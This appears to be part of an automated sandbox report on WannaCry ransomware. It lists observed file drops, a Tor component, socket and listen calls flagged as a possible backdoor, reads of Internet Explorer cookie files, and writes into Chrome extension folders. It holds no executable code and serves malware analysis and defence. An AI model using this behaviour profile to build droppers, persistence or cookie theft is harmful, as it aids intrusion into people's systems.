Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\~SD896D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\~SD896E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD896F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoIt v3\~SD8980.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\~SD8981.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SD8982.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\~SD8983.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\~SD8984.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD8994.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\~SD8995.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 2010 Tools\~SD89A6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\~SD89A7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\~SD9373.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~SD9374.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\~SD9375.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SD9376.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SD9377.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD9388.tmp

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connections (possibly a backdoor)
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe Code function: 14_2_0040D6A0 htons, socket, bind, ioctlsocket, ioctlsocket, connect, select, __WSAFDIsSet, __WSAFDIsSet, ioctlsocket, setsockopt, setsockopt, setsockopt, closesocket, 14_2_0040D6A0
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe Code function: 19_2_001EAF67 listen, listen, listen, __stack_chk_fail, 19_2_001EAF67
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe Code function: 19_2_001EC647 abort, abort, abort, _errno, bind, abort, connect, connect, __stack_chk_fail, 19_2_001EC647
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe Code function: 19_2_001EB015 _errno, _errno, setsockopt, bind, bind, getsockname, abort, memcpy, abort, __stack_chk_fail, 19_2_001EB015
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe Code function: 19_2_0031739B memset, memset, memset, memset, htonl, abort, bind, listen, getsockname, connect, getsockname, _errno, __stack_chk_fail, 19_2_0031739B

Stealing of Sensitive Information:

Searches for user-specific document files
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe Key value created or modified: C:\Users\Default\Documents
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe Key value created or modified: C:\Users\luketaylor\Documents
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe Key value created or modified: C:\Users\Public\Documents
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe Directory queried: number of queries: 1017
Steals Internet Explorer cookies
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\ML8FX5YH.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\TS324TLF.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\SBGGU5ON.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\P2JX6PN9.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\70BQC459.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\BQV5SLZ9.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\6SKQ9IC9.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\EVRD7JOF.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\XO4C6RUK.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\I75LB17C.txt

Persistence and Installation Behavior:

Drops PE files
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File created: C:\ProgramData\ywepvofkuzu108\u.wnry
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File created: C:\Users\Default\Desktop\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\ssleay32.dll
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libssp-0.dll
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File created: C:\ProgramData\ywepvofkuzu108\taskdl.exe
Source: C:\Windows\tasksche.exe File created: C:\ProgramData\ywepvofkuzu108\tasksche.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent_core-2-0-5.dll
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent-2-0-5.dll
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\zlib1.dll
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libgcc_s_sjlj-1.dll
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\tor.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libeay32.dll
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File created: C:\Users\luketaylor\Desktop\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File created: C:\Users\Public\Desktop\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File created: C:\ProgramData\ywepvofkuzu108\taskse.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent_extra-2-0-5.dll
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe File created: C:\@WanaDecryptor@.exe
Source: C:\mssecsvc.exe File created: C:\Windows\tasksche.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe File created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe
Drops PE files to the Windows directory (C:\Windows)
Source: C:\mssecsvc.exe File created: C:\Windows\tasksche.exe
Installs a Chrome extension
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_CN\~SD9636.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_TW\~SD9637.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_metadata\~SD9638.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\~SD9639.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\~SD964A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\~SD964B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ar\~SD964C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\bg\~SD964D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ca\~SD964E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\cs\~SD965F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\da\~SD9660.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\de\~SD9661.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\el\~SD9662.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\en\~SD9663.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\en_GB\~SD9664.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\en_US\~SD9674.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\es\~SD9675.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\es_419\~SD9676.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\et\~SD9677.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\fi\~SD9678.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\fil\~SD9679.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\fr\~SD968A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\he\~SD968B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\hi\~SD968C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\hr\~SD968D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\hu\~SD968E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\id\~SD968F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\it\~SD9690.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ja\~SD96A1.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ko\~SD96A2.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\lt\~SD96A3.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\lv\~SD96A4.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\nl\~SD96A5.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\no\~SD96A6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\pl\~SD96B6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\pt_BR\~SD96B7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\pt_PT\~SD96B8.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ro\~SD96B9.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\ru\~SD96BA.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\sk\~SD96BB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\sl\~SD96BC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\sr\~SD96CD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\sv\~SD96ED.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\th\~SD96FE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\tr\~SD96FF.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\uk\~SD9700.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\vi\~SD9701.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\zh_CN\~SD9702.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\_locales\zh_TW\~SD9712.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\~SD9713.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\~SD9714.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\~SD9715.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\af\~SD9716.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\am\~SD9727.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ar\~SD9728.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\az\~SD9729.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\bg\~SD972A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\bn\~SD972B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ca\~SD973C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\cs\~SD973D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\da\~SD973E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\de\~SD973F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\el\~SD974F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\en_GB\~SD9750.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\en_US\~SD9751.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\es\~SD9752.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\es_419\~SD9763.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\et\~SD9764.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\eu\~SD9765.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fa\~SD9766.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fi\~SD9776.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fil\~SD9777.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fr\~SD9788.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fr_CA\~SD9789.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\gl\~SD979A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\gu\~SD979B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hi\~SD97AB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hr\~SD97AC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hu\~SD97AD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hy\~SD97AE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\id\~SD97AF.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\is\~SD97C0.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\it\~SD97C1.tmp
